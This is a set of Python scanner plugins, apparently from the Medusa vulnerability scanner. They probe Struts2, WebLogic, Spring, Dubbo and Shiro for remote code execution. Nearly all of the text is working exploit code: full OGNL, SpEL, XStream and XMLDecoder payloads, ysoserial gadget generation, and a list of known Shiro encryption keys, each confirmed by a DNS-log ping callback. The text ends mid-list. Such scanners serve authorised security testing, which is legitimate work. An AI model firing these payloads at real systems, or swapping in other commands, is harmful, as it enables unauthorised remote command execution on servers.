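        if DL.result():
            Medusa = "{} 存在Struts2远程代码执行漏洞(S2-008)\r\n漏洞详情:\r\n版本号:S2-008\r\n使用EXP:{}\r\n返回数据:{}\r\n返回DNSLOG数据:{}\r\n使用DNSLOG:{}\r\n".format(url, payload_url, con, DL.dns_text(), DL.dns_host())
            _t = VulnerabilityInfo(Medusa)
            VulnerabilityDetails(_t.info, url, **kwargs).Write()  # hand url and finding to the reporter
            WriteFile().result(str(url), str(Medusa))  # per-target result file, keyed by url
    except Exception as e:
        # Framework convention: a plugin never aborts the scan; errors go through the shared error path.
        _ = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, _)
        ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url, e)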
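def medusa(Url: str, RandomAgent: str, proxies: str = None, **kwargs) -> None:
    """Probe *Url* for the WebLogic WLS core deserialization RCE (CVE-2018-2628).

    The actual probe is performed by the external ``exploit`` helper; this plugin prepares its
    inputs, optionally routes traffic through a SOCKS/HTTP proxy, and evaluates the DNS-log callback.

    Args:
        Url: target; UrlProcessing yields scheme, host and port.
        RandomAgent: accepted for interface compatibility; not used by this plugin.
        proxies: proxy URL or None. When set, ``socket.socket`` is replaced process-wide (see below).
        **kwargs: forwarded to VulnerabilityDetails.

    Returns:
        None. Findings go through VulnerabilityDetails/WriteFile; exceptions are logged via
        ErrorHandling/ErrorLog rather than raised.
    """
    if proxies is not None:  # was `!= None`; identity comparison is the idiom for None
        _proxy_scheme, proxies_url, proxies_port = UrlProcessing().result(proxies)
        # Process-wide side effect: every socket created afterwards in this interpreter goes
        # through the proxy, and nothing in this plugin ever restores the original socket class.
        socks.set_default_proxy(socks.HTTP, addr=proxies_url, port=proxies_port)
        socket.socket = socks.socksocket
    scheme, url, port = UrlProcessing().result(Url)
    # Default the port from the scheme only when UrlProcessing did not return one.
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    try:
        DL = Dnslog()
        JrmpPort = "2000"  # any free local port works here (original author's note)
        JrmpClient = "JRMPClient"
        YsoserialPath = GetToolFilePath().Result() + "ysoserial.jar"
        # Unique scratch path: epoch seconds plus a 10-character random suffix.
        TempPath = GetTempFilePath().Result() + str(int(time.time())) + "_" + randoms().result(10)
        con, payload = exploit(url, port, YsoserialPath, DL.dns_host(), JrmpPort, JrmpClient, TempPath)
        time.sleep(5)  # allow the out-of-band callback to arrive before polling the DNS log
        if DL.result():
            Medusa = "{}存在WeblogicWLS核心组件反序列化命令执行漏洞(CVE-2018-2628)\r\n验证数据:\r\n使用POC:{}\r\n返回数据包:{}\r\nDNSlog内容:{}\r\nDNSlog返回结果:{}\r\n".format(url, payload, con, DL.dns_host(), DL.dns_text())
            _t = VulnerabilityInfo(Medusa)
            VulnerabilityDetails(_t.info, url, **kwargs).Write()  # hand url and finding to the reporter
            WriteFile().result(str(url), str(Medusa))  # per-target result file, keyed by url
    except Exception as e:
        # Framework convention: a plugin never aborts the scan; errors go through the shared error path.
        _ = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, _)
        ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url, e)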
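def medusa(Url: str, RandomAgent: str, proxies: str = None, **kwargs) -> None:
    """Probe *Url* for the Spring Security OAuth2 RCE using a DNS-log callback.

    Args:
        Url: target; UrlProcessing yields scheme, host and port.
        RandomAgent: User-Agent string to send.
        proxies: proxy setting, normalised through Proxies().result.
        **kwargs: forwarded to VulnerabilityDetails.

    Returns:
        None. Findings go through VulnerabilityDetails/WriteFile; exceptions are logged via
        ErrorHandling/ErrorLog rather than raised.
    """
    proxies = Proxies().result(proxies)
    scheme, url, port = UrlProcessing().result(Url)
    # Default the port from the scheme only when UrlProcessing did not return one.
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    try:
        headers = {
            'User-Agent': RandomAgent,
            "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
            "Accept-Encoding": "gzip, deflate",
        }
        DL = Dnslog()
        payload = "/oauth/authorize?client_id=client&response_type=code&redirect_uri=http://www.github.com&scope=%24%7BT%28java.lang.Runtime%29.getRuntime%28%29.exec%28%22ping%20{}%22%29%7D".format(DL.dns_host())
        payload_url = scheme + "://" + url + ":" + str(port) + payload
        # verify=False disables TLS certificate checking (presumably deliberate for a scanner).
        resp = requests.get(payload_url, headers=headers, proxies=proxies, timeout=6, verify=False)
        time.sleep(4)  # allow the out-of-band callback to arrive before polling the DNS log
        if DL.result():
            Medusa = "{}存在SpringSecurityOauth2远程代码执行漏洞\r\n验证数据:\r\n返回内容:{}\r\nDnsLog:{}\r\nDnsLog数据:{}\r\n".format(url, resp.text, DL.dns_host(), str(DL.dns_text()))
            _t = VulnerabilityInfo(Medusa)
            VulnerabilityDetails(_t.info, url, **kwargs).Write()  # hand url and finding to the reporter
            WriteFile().result(str(url), str(Medusa))  # per-target result file, keyed by url
    except Exception as e:
        # Framework convention: a plugin never aborts the scan; errors go through the shared error path.
        _ = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, _)
        # Same (message, exception) argument order as every sibling plugin; the original passed
        # (url, group) and so logged the plugin group instead of the exception.
        ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url, e)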
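def medusa(**kwargs) -> None:
    """Probe the target for Struts2 S2-045 (Content-Type OGNL injection) using a DNS-log callback.

    Reads ``Url``, ``Headers`` and ``Proxies`` from *kwargs*. The caller's header dict is
    copied before the probe Content-Type is set, so the caller's headers are left untouched.

    Returns:
        None. Findings go through VulnerabilityDetails/WriteFile; exceptions are logged via
        ErrorHandling/ErrorLog rather than raised.
    """
    url = kwargs.get("Url")
    Headers = kwargs.get("Headers")
    proxies = kwargs.get("Proxies")
    DL = Dnslog()
    con = ""  # response body; stays empty when the request fails
    # Local instead of `global resp`: with the global, a failed request left the name unbound and
    # a later DL.result() hit raised NameError in the report path, losing the finding.
    resp = None
    try:
        payload_url = url
        headers = dict(Headers)  # copy so the probe Content-Type does not leak into later plugins
        headers["Content-Type"] = "%{(#nike='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='ping " + DL.dns_host() + "').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"
        try:
            # Best effort: a target that executes the expression may hang until the timeout,
            # so a failed request must not abort the DNS-log check.
            # verify=False disables TLS certificate checking (presumably deliberate for a scanner).
            resp = requests.post(payload_url, headers=headers, timeout=6, proxies=proxies, verify=False)
            con = resp.text
        except Exception:  # was a bare except, which also swallowed KeyboardInterrupt/SystemExit
            pass
        time.sleep(2)  # allow the out-of-band callback to arrive before polling the DNS log
        if DL.result():
            # Report what was actually sent; fall back to our own header dict when no response exists.
            sent_headers = resp.request.headers if resp is not None else headers
            Medusa = "{} 存在Struts2远程代码执行漏洞(S2-045)\r\n漏洞详情:\r\n版本号:S2-045\r\n使用EXP:{}\r\n返回数据:{}\r\n返回DNSLOG数据:{}\r\n使用DNSLOG:{}\r\n".format(url, sent_headers, con, DL.dns_text(), DL.dns_host())
            _t = VulnerabilityInfo(Medusa)
            VulnerabilityDetails(_t.info, resp, **kwargs).Write()  # hand the response and finding to the reporter
            WriteFile().result(str(url), str(Medusa))  # per-target result file, keyed by url
    except Exception as e:
        # Framework convention: a plugin never aborts the scan; errors go through the shared error path.
        _ = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, _)
        ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url, e)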
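def medusa(**kwargs) -> None:
    """Probe the target for the Spring Data Commons SpEL RCE (CVE-2018-1273) using a DNS-log callback.

    Reads ``Url``, ``Headers`` and ``Proxies`` from *kwargs*. The caller's header dict is copied
    before Content-Type/Referer are set, so the caller's headers are left untouched.

    Returns:
        None. Findings go through VulnerabilityDetails/WriteFile; exceptions are logged via
        ErrorHandling/ErrorLog rather than raised.
    """
    url = kwargs.get("Url")
    Headers = kwargs.get("Headers")
    proxies = kwargs.get("Proxies")
    try:
        DL = Dnslog()
        data = """username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("ping+%s")]=xxx""" % DL.dns_host()
        payload = "/users?page=&size=5"
        payload_url = url + payload
        headers = dict(Headers)  # copy so the probe headers do not leak into later plugins
        headers["Content-Type"] = "application/x-www-form-urlencoded"
        headers["Referer"] = payload_url
        # verify=False disables TLS certificate checking (presumably deliberate for a scanner).
        resp = requests.post(payload_url, data=data, headers=headers, proxies=proxies, timeout=6, verify=False)
        time.sleep(4)  # allow the out-of-band callback to arrive before polling the DNS log
        if DL.result():
            Medusa = "{}存在SpringDataCommons远程命令执行漏洞(CVE-2018-1273)\r\n验证数据:\r\n返回内容:{}\r\nDnsLog:{}\r\nDnsLog数据:{}\r\n".format(url, resp.text, DL.dns_host(), str(DL.dns_text()))
            _t = VulnerabilityInfo(Medusa)
            VulnerabilityDetails(_t.info, resp, **kwargs).Write()  # hand the response and finding to the reporter
            WriteFile().result(str(url), str(Medusa))  # per-target result file, keyed by url
    except Exception as e:
        # Framework convention: a plugin never aborts the scan; errors go through the shared error path.
        _ = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, _)
        ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url, e)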
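def medusa(Url: str, RandomAgent: str, proxies: str = None, **kwargs) -> None:
    """Probe *Url* for the Dubbo HTTP deserialization flaw (CVE-2019-17564) using a DNS-log callback.

    Args:
        Url: target; UrlProcessing yields scheme, host and port.
        RandomAgent: User-Agent string to send.
        proxies: proxy setting, normalised through Proxies().result.
        **kwargs: forwarded to VulnerabilityDetails.

    Returns:
        None. Findings go through VulnerabilityDetails/WriteFile; exceptions are logged via
        ErrorHandling/ErrorLog rather than raised.
    """
    proxies = Proxies().result(proxies)
    scheme, url, port = UrlProcessing().result(Url)
    # Default the port from the scheme only when UrlProcessing did not return one.
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    try:
        con = ""  # response body; stays empty when the request fails
        payload = '/org.apache.dubbo.samples.http.api.DemoService'
        payload_url = scheme + "://" + url + ":" + str(port) + payload
        DL = Dnslog()
        JrmpClient = "CommonsCollections4"
        YsoserialPath = GetToolFilePath().Result() + "ysoserial.jar"
        # Unique scratch path: epoch seconds plus a 10-character random suffix.
        TempPath = GetTempFilePath().Result() + str(int(time.time())) + "_" + randoms().result(10)
        data = generate_payload(YsoserialPath, "ping " + DL.dns_host(), JrmpClient, TempPath)
        headers = {
            'User-Agent': RandomAgent,
            "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
            "Accept-Encoding": "gzip, deflate",
        }
        try:
            # Best effort: a failed request must not abort the DNS-log check.
            # verify=False disables TLS certificate checking (presumably deliberate for a scanner).
            resp = requests.post(payload_url, data=data, headers=headers, proxies=proxies, timeout=6, verify=False)
            con = resp.text
        except Exception:  # was a bare except, which also swallowed KeyboardInterrupt/SystemExit
            pass
        if DL.result():
            Medusa = "{} 存在Dubbo反序列化漏洞(CVE-2019-17564)\r\n验证数据:\r\n返回DNSLOG:{}\r\n使用DNSLOG数据:{}\r\n返回数据包:{}\r\n".format(url, DL.dns_text(), DL.dns_host(), con)
            # The stray debug print(Medusa) was removed: sibling plugins report only via the
            # reporter/result file, and stdout is not part of the plugin contract.
            _t = VulnerabilityInfo(Medusa)
            VulnerabilityDetails(_t.info, url, **kwargs).Write()  # hand url and finding to the reporter
            WriteFile().result(str(url), str(Medusa))  # per-target result file, keyed by url
    except Exception as e:
        # Framework convention: a plugin never aborts the scan; errors go through the shared error path.
        _ = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, _)
        ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url, e)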
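def medusa(**kwargs) -> None:
    """Probe the target for Struts2 S2-015 (action-name OGNL injection) using a DNS-log callback.

    Reads ``Url``, ``Headers`` and ``Proxies`` from *kwargs*. The probe path is appended to
    ``Url`` as given; no scheme/port normalisation is performed here.

    Returns:
        None. Findings go through VulnerabilityDetails/WriteFile; exceptions are logged via
        ErrorHandling/ErrorLog rather than raised.
    """
    url = kwargs.get("Url")
    Headers = kwargs.get("Headers")
    proxies = kwargs.get("Proxies")
    DL = Dnslog()
    con = ""  # response body; stays empty when the request fails
    # Initialised up front: the original left `resp` unbound when the request failed, so a later
    # DL.result() hit raised NameError in VulnerabilityDetails(...) and the finding was lost.
    resp = None
    payload = """%24%7B%23context%5B%27xwork.MethodAccessor.denyMethodExecution%27%5D%3Dfalse%2C%23m%3D%23_memberAccess.getClass%28%29.getDeclaredField%28%27allowStaticMethodAccess%27%29%2C%23m.setAccessible%28true%29%2C%23m.set%28%23_memberAccess%2Ctrue%29%2C%23q%[email protected]@toString%[email protected]@getRuntime%28%29.exec%28%27ping%20{}%27%29.getInputStream%28%29%29%2C%23q%7D.action""".format(DL.dns_host())
    try:
        payload_url = url + payload
        try:
            # Best effort: a target that executes the expression may hang until the timeout,
            # so a failed request must not abort the DNS-log check.
            # verify=False disables TLS certificate checking (presumably deliberate for a scanner).
            resp = requests.get(payload_url, headers=Headers, timeout=6, proxies=proxies, verify=False)
            con = resp.text
        except Exception:  # was a bare except, which also swallowed KeyboardInterrupt/SystemExit
            pass
        time.sleep(2)  # allow the out-of-band callback to arrive before polling the DNS log
        if DL.result():
            Medusa = "{} 存在Struts2远程代码执行漏洞(S2-015)\r\n漏洞详情:\r\n版本号:S2-015\r\n使用EXP:{}\r\n返回数据:{}\r\n返回DNSLOG数据:{}\r\n使用DNSLOG:{}\r\n".format(url, payload_url, con, DL.dns_text(), DL.dns_host())
            _t = VulnerabilityInfo(Medusa)
            VulnerabilityDetails(_t.info, resp, **kwargs).Write()  # hand the response and finding to the reporter
            WriteFile().result(str(url), str(Medusa))  # per-target result file, keyed by url
    except Exception as e:
        # Framework convention: a plugin never aborts the scan; errors go through the shared error path.
        _ = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, _)
        ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url, e)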
def medusa(Url:str,Headers:dict,proxies:str=None,**kwargs)->None:
    """Probe *Url* for Struts2 S2-052 (REST plugin XStream deserialization) using a DNS-log callback.

    Args:
        Url: target; UrlProcessing yields scheme, host, port and path.
        Headers: caller-supplied request headers; passed through unchanged. NOTE(review): the
            request body is XML, but no Content-Type is set here — it is expected to come from
            *Headers* (confirm with the caller).
        proxies: proxy setting, normalised through Proxies().result.
        **kwargs: forwarded to VulnerabilityDetails.

    Returns:
        None. Findings go through VulnerabilityDetails/WriteFile; exceptions are logged via
        ErrorHandling/ErrorLog rather than raised.

    NOTE(review): the XML body below appears to have lost its original line breaks in this copy
    of the file (it sits on one line); whitespace between elements should not matter to the
    parser, but verify against the upstream source.
    """
    proxies=Proxies().result(proxies)
    scheme, url, port,path = UrlProcessing().result(Url)
    # Default the port from the scheme only when UrlProcessing did not return one.
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port  # no-op kept as written
    DL=Dnslog()
    con=""  # response body; stays empty when the request fails
    # The <string>{}</string> placeholder is filled with the DNS-log host, the only evidence channel used here.
    data="""<map> <entry> <jdk.nashorn.internal.objects.NativeString> <flags>0</flags> <value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data"> <dataHandler> <dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource"> <is class="javax.crypto.CipherInputStream"> <cipher class="javax.crypto.NullCipher"> <initialized>false</initialized> <opmode>0</opmode> <serviceIterator class="javax.imageio.spi.FilterIterator"> <iter class="javax.imageio.spi.FilterIterator"> <iter class="java.util.Collections$EmptyIterator"/> <next class="java.lang.ProcessBuilder"> <command> <string>ping</string> <string>{}</string> </command> <redirectErrorStream>false</redirectErrorStream> </next> </iter> <filter class="javax.imageio.ImageIO$ContainsFilter"> <method> <class>java.lang.ProcessBuilder</class> <name>start</name> <parameter-types/> </method> <name>foo</name> </filter> <next class="string">foo</next> </serviceIterator> <lock/> </cipher> <input class="java.lang.ProcessBuilder$NullInputStream"/> <ibuffer></ibuffer> <done>false</done> <ostart>0</ostart> <ofinish>0</ofinish> <closed>false</closed> </is> <consumed>false</consumed> </dataSource> <transferFlavors/> </dataHandler> <dataLen>0</dataLen> </value> </jdk.nashorn.internal.objects.NativeString> <jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/> </entry> <entry> <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/> <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/> </entry> </map>""".format(DL.dns_host())
    try:
        payload_url = scheme + "://" + url +":"+ str(port)+path
        try:
            # Best effort: a target that executes the gadget chain may hang until the timeout,
            # so a failed request must not abort the DNS-log check (author's original intent).
            # NOTE(review): bare except also swallows KeyboardInterrupt/SystemExit.
            # verify=False disables TLS certificate checking (presumably deliberate for a scanner).
            resp = requests.post(payload_url,headers=Headers,data=data, timeout=6,proxies=proxies, verify=False)
            con = resp.text
        except:
            pass
        # NOTE(review): no delay before DL.result(), unlike the sibling Struts2 plugins.
        if DL.result():
            Medusa = "{} 存在Struts2远程代码执行漏洞(S2-052)\r\n漏洞详情:\r\n版本号:S2-052\r\n使用EXP:{}\r\n返回数据:{}\r\n返回DNSLOG数据:{}\r\n使用DNSLOG:{}\r\n".format(url,data,con,DL.dns_text(),DL.dns_host())
            _t=VulnerabilityInfo(Medusa)
            VulnerabilityDetails(_t.info, url,**kwargs).Write()  # hand url and finding to the reporter
            WriteFile().result(str(url),str(Medusa))  # per-target result file, keyed by url
    except Exception as e:
        # Framework convention: a plugin never aborts the scan; errors go through the shared error path.
        _ = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, _)
        _l = ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)
def medusa(**kwargs) -> None:
    """Probe the target for the Spring Security OAuth2 RCE (CVE-2018-1260) using a DNS-log callback.

    Reads ``Url``, ``Headers`` and ``Proxies`` from *kwargs*; the probe path is appended to
    ``Url`` as given.

    Returns:
        None. A finding is recorded through VulnerabilityDetails and WriteFile; any exception
        is routed to ErrorHandling/ErrorLog instead of propagating.
    """
    target = kwargs.get("Url")
    request_headers = kwargs.get("Headers")
    proxy_setting = kwargs.get("Proxies")
    try:
        dnslog = Dnslog()
        # The DNS-log hostname in the scope parameter is the only evidence channel used here.
        probe_path = "/oauth/authorize?client_id=client&response_type=code&redirect_uri=http://www.github.com&scope=%24%7BT%28java.lang.Runtime%29.getRuntime%28%29.exec%28%22ping%20{}%22%29%7D".format(dnslog.dns_host())
        probe_url = target + probe_path
        # verify=False disables TLS certificate checking (presumably deliberate for a scanner).
        response = requests.get(probe_url, headers=request_headers, proxies=proxy_setting, timeout=6, verify=False)
        time.sleep(4)  # allow the out-of-band callback to arrive before polling the DNS log
        if not dnslog.result():
            return
        report = "{}存在SpringSecurityOauth2远程代码执行漏洞(CVE-2018-1260)\r\n验证数据:\r\n返回内容:{}\r\nDnsLog:{}\r\nDnsLog数据:{}\r\n".format(target, response.text, dnslog.dns_host(), str(dnslog.dns_text()))
        details = VulnerabilityInfo(report)
        VulnerabilityDetails(details.info, response, **kwargs).Write()  # hand the response and finding to the reporter
        WriteFile().result(str(target), str(report))  # per-target result file, keyed by url
    except Exception as err:
        # Framework convention: a plugin never aborts the scan; errors go through the shared error path.
        group = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(err, group)
        ErrorLog().Write("Plugin Name:" + group + " || Target Url:" + target, err)
<doc_update>
def medusa(**kwargs)->None:
    """WebLogic XMLDecoder check plugin (CVE-2017-10271, per the report string).

    Posts two SOAP documents (a ``/bin/bash -c`` and a ``cmd.exe /c``
    variant, both running only ``ping <dnslog host>``) to
    ``<Url>/wls-wsat/CoordinatorPortType`` and reports a hit after either
    one if ``DL.result()`` is truthy.  One ``Dnslog`` instance is shared by
    both requests, so the report cannot tell which variant triggered the
    callback.

    Keyword args (read with ``kwargs.get``, so each may be ``None``):
        Url: target URL, used verbatim as the request prefix.
        Headers: request headers; **mutated in place** (see below).
        Proxies: proxy specification for ``requests.post``.
    Remaining kwargs are forwarded to ``VulnerabilityDetails``.

    Returns:
        None. Errors are routed to ``ErrorHandling`` / ``ErrorLog``.
    """
    url = kwargs.get("Url") # target URL passed in by the scanner
    Headers = kwargs.get("Headers") # request headers passed in
    proxies = kwargs.get("Proxies") # proxy settings passed in
    DL = Dnslog()
    # The command in the <string> elements is limited to `ping <dnslog host>`,
    # so the only observable effect of this check is the DNS callback.
    linux_data='''<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java version="1.4.0" class="java.beans.XMLDecoder"> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>ping {}</string> </void> </array> <void method="start"/></void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>'''.format(DL.dns_host())
    # NOTE(review): `C:\Windows\System32\cmd.exe` is inside a non-raw literal;
    # `\W` and `\S` are invalid escapes (kept verbatim, but Python warns).
    windows_data='''<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java version="1.8.0_131" class="java.beans.XMLDecoder"> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>C:\Windows\System32\cmd.exe</string> </void> <void index="1"> <string>/c</string> </void> <void index="2"> <string>ping {}</string> </void> </array> <void method="start"/></void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope> '''.format(DL.dns_host())
    for data in [linux_data, windows_data]:
        try:
            payload = '/wls-wsat/CoordinatorPortType'
            payload_url = url+ payload
            # NOTE(review): writes into the caller's Headers dict (side effect
            # visible to every later plugin); raises TypeError if Headers is None.
            Headers["Content-Type"]="text/xml"
            resp = requests.post(payload_url,headers=Headers,data=data, proxies=proxies, timeout=6, verify=False)  # verify=False: TLS certificate not checked
            con = resp.text
            time.sleep(4)  # give the callback time to arrive before polling
            # No `break` on a hit: the second variant is still sent and, with the
            # shared DL, can produce a second report for the same target.
            if DL.result():
                Medusa = "{}存在WebLogicXMLDecoder反序列化漏洞(CVE-2017-10271)\r\n验证数据:\r\n漏洞位置:{}\r\n利用POC:{}\r\n返回数据包:{}\r\nDNSlog数据:{}\r\nDNSlog随机数:{}\r\n".format(url, payload_url,data, con,DL.dns_text(),DL.dns_host())
                _t = VulnerabilityInfo(Medusa)
                # NOTE(review): passes the Response object where sibling plugins
                # pass `url`; confirm what VulnerabilityDetails expects.
                VulnerabilityDetails(_t.info, resp,**kwargs).Write() # record the url and the scan result
                WriteFile().result(str(url),str(Medusa))# write to file: url is the per-target file name, Medusa is the result
        except Exception as e:
            _ = VulnerabilityInfo('').info.get('algroup')  # None if the key is absent -> concatenation below raises
            ErrorHandling().Outlier(e, _)
            ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e) # log the error with the target URL and plugin name
def medusa(Url: str, RandomAgent: str, proxies: str = None, **kwargs) -> None:
    """Shiro ``rememberMe`` cookie check plugin (CVE-2016-4437, per the report string).

    For every entry of ``CipherKey`` the plugin:
      1. runs the external ``ysoserial.jar`` (``JRMPClient`` with a fresh
         DNS-log host as argument) and reads its stdout,
      2. PKCS#7-pads that output, AES-CBC-encrypts it under the base64-decoded
         key with a random 16-byte IV, and base64-encodes ``IV || ciphertext``,
      3. sends the result as the ``rememberMe`` cookie in one GET to the
         target's origin (scheme://host:port, no path),
      4. treats a truthy ``DL.result()`` as a hit for that key and stops.

    A fresh ``Dnslog`` per key is what lets the report name the key that
    produced the callback.  Keys that are not valid base64 or do not decode
    to an AES key length make ``b64decode``/``AES.new`` raise; that is caught
    by the per-key handler, logged, and the loop moves on.

    Args:
        Url: target; ``UrlProcessing`` splits it into scheme, host and port.
        RandomAgent: accepted but unused — no headers are sent with the request.
        proxies: proxy specification, normalised by ``Proxies().result``.
        **kwargs: forwarded to ``VulnerabilityDetails``.

    Returns:
        None.

    NOTE(review): ``AES`` is presumably ``Crypto.Cipher.AES`` — the import is
    outside this view; confirm.
    """
    proxies = Proxies().result(proxies)
    scheme, url, port = UrlProcessing().result(Url)
    # Default the port from the scheme when the URL carries none.
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port  # no-op branch: an explicit port is kept as given
    ExpClass = "JRMPClient"  # ysoserial payload class name passed on the command line
    # Candidate rememberMe keys, base64-encoded. Kept exactly as found.
    CipherKey = [
        "kPH+bIxk5D2deZiIxcaaaA==", "2AvVhdsgUs0FSA3SDFAdag==", "3AvVhmFLUs0KTA3Kprsdag==", "4AvVhmFLUs0KTA3Kprsdag==",
        "5AvVhmFLUs0KTA3Kprsdag==", "5aaC5qKm5oqA5pyvAAAAAA==", "6ZmI6I2j5Y+R5aSn5ZOlAA==", "bWljcm9zAAAAAAAAAAAAAA==",
        "wGiHplamyXlVB11UXWol8g==", "Z3VucwAAAAAAAAAAAAAAAA==", "MTIzNDU2Nzg5MGFiY2RlZg==", "U3ByaW5nQmxhZGUAAAAAAA==",
        "fCq+/xW488hMTCD+cmJ3aQ==", "1QWLxg+NYmxraMoxAXu/Iw==", "ZUdsaGJuSmxibVI2ZHc9PQ==", "L7RioUULEFhRyxM7a2R/Yg==",
        "r0e3c16IdVkouZgk1TKVMg==", "bWluZS1hc3NldC1rZXk6QQ==", "a2VlcE9uR29pbmdBbmRGaQ==", "WcfHGU25gNnTxTlmJMeSpw==",
        "OY//C4rhfwNxCQAQCrQQ1Q==", "5J7bIJIV0LQSN3c9LPitBQ==", "f/SY5TIve5WWzT4aQlABJA==", "bya2HkYo57u6fWh5theAWw==",
        "WuB+y2gcHRnY2Lg9+Aqmqg==", "kPv59vyqzj00x11LXJZTjJ2UHW48jzHN", "3qDVdLawoIr1xFd6ietnwg==", "ZWvohmPdUsAWT3=KpPqda",
        "YI1+nBV//m7ELrIyDHm6DQ==", "6Zm+6I2j5Y+R5aS+5ZOlAA==", "2A2V+RFLUs+eTA3Kpr+dag==", "6ZmI6I2j3Y+R1aSn5BOlAA==",
        "SkZpbmFsQmxhZGUAAAAAAA==", "2cVtiE83c4lIrELJwKGJUw==", "fsHspZw/92PrS3XrPW+vxw==", "XTx6CKLo/SdSgub+OPHSrw==",
        "sHdIjUN6tzhl8xZMG3ULCQ==", "O4pdf+7e+mZe8NyxMTPJmQ==", "HWrBltGvEZc14h9VpMvZWw==", "rPNqM6uKFCyaL10AK51UkQ==",
        "Y1JxNSPXVwMkyvES/kJGeQ==", "lT2UvDUmQwewm6mMoiw4Ig==", "MPdCMZ9urzEA50JDlDYYDg==", "xVmmoltfpb8tTceuT5R7Bw==",
        "c+3hFGPjbgzGdrC+MHgoRQ==", "ClLk69oNcA3m+s0jIMIkpg==", "Bf7MfkNR0axGGptozrebag==", "1tC/xrDYs8ey+sa3emtiYw==",
        "ZmFsYWRvLnh5ei5zaGlybw==", "cGhyYWNrY3RmREUhfiMkZA==", "IduElDUpDDXE677ZkhhKnQ==", "yeAAo1E8BOeAYfBlm4NG9Q==",
        "cGljYXMAAAAAAAAAAAAAAA==", "2itfW92XazYRi5ltW0M2yA==", "XgGkgqGqYrix9lI6vxcrRw==", "ertVhmFLUs0KTA3Kprsdag==",
        "5AvVhmFLUS0ATA4Kprsdag==", "s0KTA3mFLUprK4AvVhsdag==", "hBlzKg78ajaZuTE0VLzDDg==", "9FvVhtFLUs0KnA3Kprsdyg==",
        "d2ViUmVtZW1iZXJNZUtleQ==", "yNeUgSzL/CfiWw1GALg6Ag==", "NGk/3cQ6F5/UNPRh8LpMIg==", "4BvVhmFLUs0KTA3Kprsdag==",
        "MzVeSkYyWTI2OFVLZjRzZg==", "CrownKey==a12d/dakdad", "empodDEyMwAAAAAAAAAAAA==", "A7UzJgh1+EWj5oBFi+mSgw==",
        "YTM0NZomIzI2OTsmIzM0NTueYQ==", "c2hpcm9fYmF0aXMzMgAAAA==", "i45FVt72K2kLgvFrJtoZRw==", "U3BAbW5nQmxhZGUAAAAAAA==",
        "ZnJlc2h6Y24xMjM0NTY3OA==", "Jt3C93kMR9D5e8QzwfsiMw==", "MTIzNDU2NzgxMjM0NTY3OA==", "vXP33AonIp9bFwGl7aT7rA==",
        "V2hhdCBUaGUgSGVsbAAAAA==", "Z3h6eWd4enklMjElMjElMjE=", "Q01TX0JGTFlLRVlfMjAxOQ==", "ZAvph3dsQs0FSL3SDFAdag==",
